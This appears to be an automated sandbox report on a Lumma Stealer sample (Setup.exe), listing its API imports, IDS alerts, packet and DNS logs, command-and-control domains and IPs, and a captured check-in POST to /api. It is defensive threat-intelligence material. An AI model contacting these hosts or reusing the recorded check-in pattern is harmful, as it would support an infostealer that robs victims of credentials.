kernel32.dll	SetFileAttributesW, GetFileTime, GetFileType, SetFileTime, QueryDosDeviceW, GetACP, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, ExitProcess, HeapAlloc, GetCPInfoExW, GlobalSize, RtlUnwind, GetCPInfo, EnumSystemLocalesW, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, TryEnterCriticalSection, HeapDestroy, FileTimeToDosDateTime, ReadFile, DosDateTimeToFileTime, GetUserDefaultLCID, GetLastError, GetModuleFileNameW, SetLastError, GlobalAlloc, GlobalUnlock, FindResourceW, CreateThread, CompareStringW, MapViewOfFile, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, WTSGetActiveConsoleSessionId, FreeResource, GetDriveTypeW, GetVersion, RaiseException, GlobalAddAtomW, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, GetFileAttributesExW, ExpandEnvironmentStringsW, QueueUserAPC, LoadLibraryExW, LockResource, FileTimeToSystemTime, GetCurrentThreadId, UnhandledExceptionFilter, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, GlobalLock, SetThreadPriority, VirtualAlloc, GetTempPathW, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetLogicalDriveStringsW, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetProcessTimes, GetWindowsDirectoryW, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, GetConsoleOutputCP, UnmapViewOfFile, GetConsoleCP, GlobalHandle, lstrlenW, SetEndOfFile, QueryPerformanceCounter, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, GetLocaleInfoW, CreateFileW, EnumResourceNamesW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateFileMappingW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, SleepEx, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, RemoveDirectoryW, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
wsock32.dll	send
userenv.dll	CreateEnvironmentBlock
ole32.dll	OleRegEnumVerbs, IsAccelerator, CoCreateInstance, CoUninitialize, IsEqualGUID, CreateStreamOnHGlobal, OleInitialize, ProgIDFromCLSID, CLSIDFromProgID, OleUninitialize, CoGetClassObject, CoInitialize, CoTaskMemFree, OleDraw, CoTaskMemAlloc, OleSetMenuDescriptor, StringFromCLSID
gdi32.dll	AddFontMemResourceEx, Pie, SetBkMode, CreateCompatibleBitmap, CreatePolygonRgn, BeginPath, GetEnhMetaFileHeader, CloseEnhMetaFile, RectVisible, AngleArc, ResizePalette, SetAbortProc, SetTextColor, StretchBlt, RoundRect, SelectClipRgn, RestoreDC, SetRectRgn, FillPath, GetTextMetricsW, GetWindowOrgEx, CreatePalette, CreateDCW, PolyBezierTo, CreateICW, GetStockObject, CreateSolidBrush, Polygon, MoveToEx, PlayEnhMetaFile, Ellipse, StartPage, GetBitmapBits, StartDocW, AbortDoc, GetSystemPaletteEntries, GetEnhMetaFileBits, GetEnhMetaFilePaletteEntries, CreatePenIndirect, SetMapMode, CreateFontIndirectW, PolyBezier, LPtoDP, RemoveFontResourceExW, EndDoc, GetObjectW, GetCurrentObject, GetWinMetaFileBits, SetROP2, GetOutlineTextMetricsW, GetEnhMetaFileDescriptionW, ArcTo, GetKerningPairs, CreateEnhMetaFileW, Arc, SelectPalette, ExcludeClipRect, MaskBlt, SetWindowOrgEx, EndPath, EndPage, DeleteEnhMetaFile, Chord, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, GetGlyphOutlineW, CreateBrushIndirect, PatBlt, SetEnhMetaFileBits, Rectangle, SaveDC, DeleteDC, BitBlt, FrameRgn, GetDeviceCaps, GetTextExtentPoint32W, GetClipBox, IntersectClipRect, Polyline, CreateBitmap, CombineRgn, SetWinMetaFileBits, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, SetStretchBltMode, GetDIBits, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, SelectObject, DeleteObject, ExtFloodFill, UnrealizeObject, CopyEnhMetaFileW, SetBkColor, CreateCompatibleDC, GetBrushOrgEx, GetCurrentPositionEx, GetNearestPaletteIndex, RemoveFontMemResourceEx, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, GdiFlush, SetPixel, EnumFontFamiliesExW, StretchDIBits, GetPath, GetPaletteEntries

Exports

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x478c3c
__dbk_fcall_wrapper	2	0x412d4c
dbkFCallWrapperAddr	1	0xaf0640

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-24T00:43:15.163736+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.58.45	443	TCP
2024-12-24T00:43:15.898058+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.58.45	443	TCP
2024-12-24T00:43:15.898058+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.58.45	443	TCP
2024-12-24T00:43:17.135397+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.58.45	443	TCP
2024-12-24T00:43:17.902078+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	104.21.58.45	443	TCP
2024-12-24T00:43:17.902078+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.58.45	443	TCP
2024-12-24T00:43:19.445183+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.58.45	443	TCP
2024-12-24T00:43:21.769008+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.58.45	443	TCP
2024-12-24T00:43:24.081322+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	104.21.58.45	443	TCP
2024-12-24T00:43:27.019056+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.58.45	443	TCP
2024-12-24T00:43:28.058675+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49739	104.21.58.45	443	TCP
2024-12-24T00:43:29.378630+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.58.45	443	TCP
2024-12-24T00:43:31.773179+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.58.45	443	TCP
2024-12-24T00:43:32.834281+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49743	104.21.58.45	443	TCP
2024-12-24T00:43:34.251949+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	104.21.27.229	443	TCP
2024-12-24T00:43:38.981724+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	104.21.84.113	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 00:43:13.932691097 CET	49730	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:13.932744980 CET	443	49730	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:13.932811022 CET	49730	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:13.936335087 CET	49730	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:13.936350107 CET	443	49730	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:15.163661957 CET	443	49730	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:15.163736105 CET	49730	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:15.166953087 CET	49730	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:15.166964054 CET	443	49730	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:15.167504072 CET	443	49730	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:15.213521004 CET	49730	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:15.213546991 CET	49730	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:15.213627100 CET	443	49730	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:15.898134947 CET	443	49730	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:15.898400068 CET	443	49730	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:15.898463964 CET	49730	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:15.900628090 CET	49730	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:15.900641918 CET	443	49730	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:15.912115097 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:15.912215948 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:15.912308931 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:15.912571907 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:15.912607908 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.135281086 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.135396957 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:17.137084007 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:17.137116909 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.137625933 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.139326096 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:17.139364958 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:17.139416933 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.902156115 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.902292967 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.902374029 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:17.902384996 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.902441025 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.902499914 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:17.902517080 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.904458046 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.904525042 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:17.904537916 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.912837982 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.912894964 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:17.912909031 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.921328068 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.921391964 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:17.921405077 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:17.967360973 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:18.021656990 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:18.022003889 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:18.022188902 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:18.022188902 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:18.022188902 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:18.185381889 CET	49732	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:18.185472012 CET	443	49732	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:18.185554981 CET	49732	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:18.185863018 CET	49732	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:18.185908079 CET	443	49732	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:18.326828957 CET	49731	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:18.326894045 CET	443	49731	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:19.445075989 CET	443	49732	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:19.445183039 CET	49732	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:19.446579933 CET	49732	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:19.446608067 CET	443	49732	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:19.447109938 CET	443	49732	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:19.448440075 CET	49732	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:19.448646069 CET	49732	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:19.448694944 CET	443	49732	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:19.448770046 CET	49732	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:19.448786974 CET	443	49732	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:20.381498098 CET	443	49732	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:20.381750107 CET	443	49732	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:20.381845951 CET	49732	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:20.381937027 CET	49732	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:20.381975889 CET	443	49732	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:20.544297934 CET	49734	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:20.544365883 CET	443	49734	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:20.544481993 CET	49734	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:20.544801950 CET	49734	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:20.544853926 CET	443	49734	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:21.768893003 CET	443	49734	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:21.769007921 CET	49734	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:21.770423889 CET	49734	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:21.770452023 CET	443	49734	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:21.771534920 CET	443	49734	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:21.772876978 CET	49734	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:21.773000956 CET	49734	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:21.773051023 CET	443	49734	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:22.606527090 CET	443	49734	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:22.606806040 CET	443	49734	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:22.607090950 CET	49734	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:22.607090950 CET	49734	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:22.860466957 CET	49736	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:22.860512018 CET	443	49736	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:22.860582113 CET	49736	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:22.860896111 CET	49736	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:22.860909939 CET	443	49736	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:22.920449972 CET	49734	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:22.920512915 CET	443	49734	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:24.081223011 CET	443	49736	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:24.081321955 CET	49736	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:24.093060017 CET	49736	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:24.093076944 CET	443	49736	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:24.093661070 CET	443	49736	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:24.095356941 CET	49736	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:24.095684052 CET	49736	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:24.095755100 CET	443	49736	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:24.095813990 CET	49736	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:24.095823050 CET	443	49736	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:25.315210104 CET	443	49736	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:25.315519094 CET	443	49736	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:25.315588951 CET	49736	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:25.315701008 CET	49736	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:25.315715075 CET	443	49736	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:25.796638966 CET	49739	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:25.796730042 CET	443	49739	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:25.796859980 CET	49739	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:25.797288895 CET	49739	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:25.797317028 CET	443	49739	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:27.018943071 CET	443	49739	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:27.019056082 CET	49739	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:27.020517111 CET	49739	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:27.020539045 CET	443	49739	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:27.021342993 CET	443	49739	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:27.028170109 CET	49739	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:27.028247118 CET	49739	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:27.028254986 CET	443	49739	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:28.058747053 CET	443	49739	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:28.059019089 CET	443	49739	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:28.059087038 CET	49739	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:28.059202909 CET	49739	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:28.059231043 CET	443	49739	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:28.155616045 CET	49742	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:28.155656099 CET	443	49742	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:28.155730963 CET	49742	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:28.155966997 CET	49742	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:28.155986071 CET	443	49742	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:29.378473043 CET	443	49742	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:29.378629923 CET	49742	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:29.380069017 CET	49742	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:29.380080938 CET	443	49742	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:29.381093979 CET	443	49742	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:29.388961077 CET	49742	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:29.389054060 CET	49742	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:29.389060974 CET	443	49742	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:30.493305922 CET	443	49742	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:30.493557930 CET	443	49742	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:30.493624926 CET	49742	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:30.493710041 CET	49742	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:30.493727922 CET	443	49742	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:30.553127050 CET	49743	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:30.553165913 CET	443	49743	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:30.553248882 CET	49743	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:30.553503990 CET	49743	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:30.553517103 CET	443	49743	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:31.772981882 CET	443	49743	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:31.773179054 CET	49743	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:31.774441004 CET	49743	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:31.774450064 CET	443	49743	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:31.774852991 CET	443	49743	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:31.787841082 CET	49743	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:31.787879944 CET	49743	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:31.788012981 CET	443	49743	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:32.834363937 CET	443	49743	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:32.834625959 CET	443	49743	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:32.834688902 CET	49743	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:32.834875107 CET	49743	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:32.834887981 CET	443	49743	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:32.834897995 CET	49743	443	192.168.2.4	104.21.58.45
Dec 24, 2024 00:43:32.834903002 CET	443	49743	104.21.58.45	192.168.2.4
Dec 24, 2024 00:43:33.020358086 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 00:43:33.020404100 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 00:43:33.020486116 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 00:43:33.020868063 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 00:43:33.020879984 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 00:43:34.251846075 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 00:43:34.251949072 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 00:43:34.256589890 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 00:43:34.256617069 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 00:43:34.256989956 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 00:43:34.258711100 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 00:43:34.299350023 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 00:43:37.599556923 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 00:43:37.599735975 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 00:43:37.599811077 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 00:43:37.599922895 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 00:43:37.599970102 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 00:43:37.599998951 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 00:43:37.600013971 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 00:43:37.756144047 CET	49745	443	192.168.2.4	104.21.84.113
Dec 24, 2024 00:43:37.756192923 CET	443	49745	104.21.84.113	192.168.2.4
Dec 24, 2024 00:43:37.756272078 CET	49745	443	192.168.2.4	104.21.84.113
Dec 24, 2024 00:43:37.756577969 CET	49745	443	192.168.2.4	104.21.84.113
Dec 24, 2024 00:43:37.756594896 CET	443	49745	104.21.84.113	192.168.2.4
Dec 24, 2024 00:43:38.981615067 CET	443	49745	104.21.84.113	192.168.2.4
Dec 24, 2024 00:43:38.981724024 CET	49745	443	192.168.2.4	104.21.84.113
Dec 24, 2024 00:43:38.983273029 CET	49745	443	192.168.2.4	104.21.84.113
Dec 24, 2024 00:43:38.983299017 CET	443	49745	104.21.84.113	192.168.2.4
Dec 24, 2024 00:43:38.983726025 CET	443	49745	104.21.84.113	192.168.2.4
Dec 24, 2024 00:43:38.986148119 CET	49745	443	192.168.2.4	104.21.84.113
Dec 24, 2024 00:43:39.027352095 CET	443	49745	104.21.84.113	192.168.2.4
Dec 24, 2024 00:43:39.416143894 CET	443	49745	104.21.84.113	192.168.2.4
Dec 24, 2024 00:43:39.416446924 CET	443	49745	104.21.84.113	192.168.2.4
Dec 24, 2024 00:43:39.416542053 CET	443	49745	104.21.84.113	192.168.2.4
Dec 24, 2024 00:43:39.416629076 CET	443	49745	104.21.84.113	192.168.2.4
Dec 24, 2024 00:43:39.416810989 CET	443	49745	104.21.84.113	192.168.2.4
Dec 24, 2024 00:43:39.417324066 CET	49745	443	192.168.2.4	104.21.84.113
Dec 24, 2024 00:43:39.417942047 CET	49745	443	192.168.2.4	104.21.84.113
Dec 24, 2024 00:43:39.417980909 CET	443	49745	104.21.84.113	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 00:43:13.593772888 CET	57074	53	192.168.2.4	1.1.1.1
Dec 24, 2024 00:43:13.926120996 CET	53	57074	1.1.1.1	192.168.2.4
Dec 24, 2024 00:43:32.878551006 CET	50116	53	192.168.2.4	1.1.1.1
Dec 24, 2024 00:43:33.019407034 CET	53	50116	1.1.1.1	192.168.2.4
Dec 24, 2024 00:43:37.614937067 CET	49625	53	192.168.2.4	1.1.1.1
Dec 24, 2024 00:43:37.755337954 CET	53	49625	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 00:43:13.593772888 CET	192.168.2.4	1.1.1.1	0xe65c	Standard query (0)	moanungsnake.click	A (IP address)	IN (0x0001)	false
Dec 24, 2024 00:43:32.878551006 CET	192.168.2.4	1.1.1.1	0x6a74	Standard query (0)	neqi.shop	A (IP address)	IN (0x0001)	false
Dec 24, 2024 00:43:37.614937067 CET	192.168.2.4	1.1.1.1	0x592d	Standard query (0)	kliptizq.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 00:43:13.926120996 CET	1.1.1.1	192.168.2.4	0xe65c	No error (0)	moanungsnake.click	104.21.58.45	A (IP address)	IN (0x0001)	false
Dec 24, 2024 00:43:13.926120996 CET	1.1.1.1	192.168.2.4	0xe65c	No error (0)	moanungsnake.click	172.67.156.56	A (IP address)	IN (0x0001)	false
Dec 24, 2024 00:43:33.019407034 CET	1.1.1.1	192.168.2.4	0x6a74	No error (0)	neqi.shop	104.21.27.229	A (IP address)	IN (0x0001)	false
Dec 24, 2024 00:43:33.019407034 CET	1.1.1.1	192.168.2.4	0x6a74	No error (0)	neqi.shop	172.67.169.205	A (IP address)	IN (0x0001)	false
Dec 24, 2024 00:43:37.755337954 CET	1.1.1.1	192.168.2.4	0x592d	No error (0)	kliptizq.shop	104.21.84.113	A (IP address)	IN (0x0001)	false
Dec 24, 2024 00:43:37.755337954 CET	1.1.1.1	192.168.2.4	0x592d	No error (0)	kliptizq.shop	172.67.191.144	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

moanungsnake.click

neqi.shop

kliptizq.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.58.45	443	7036	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 23:43:15 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: moanungsnake.click
2024-12-23 23:43:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
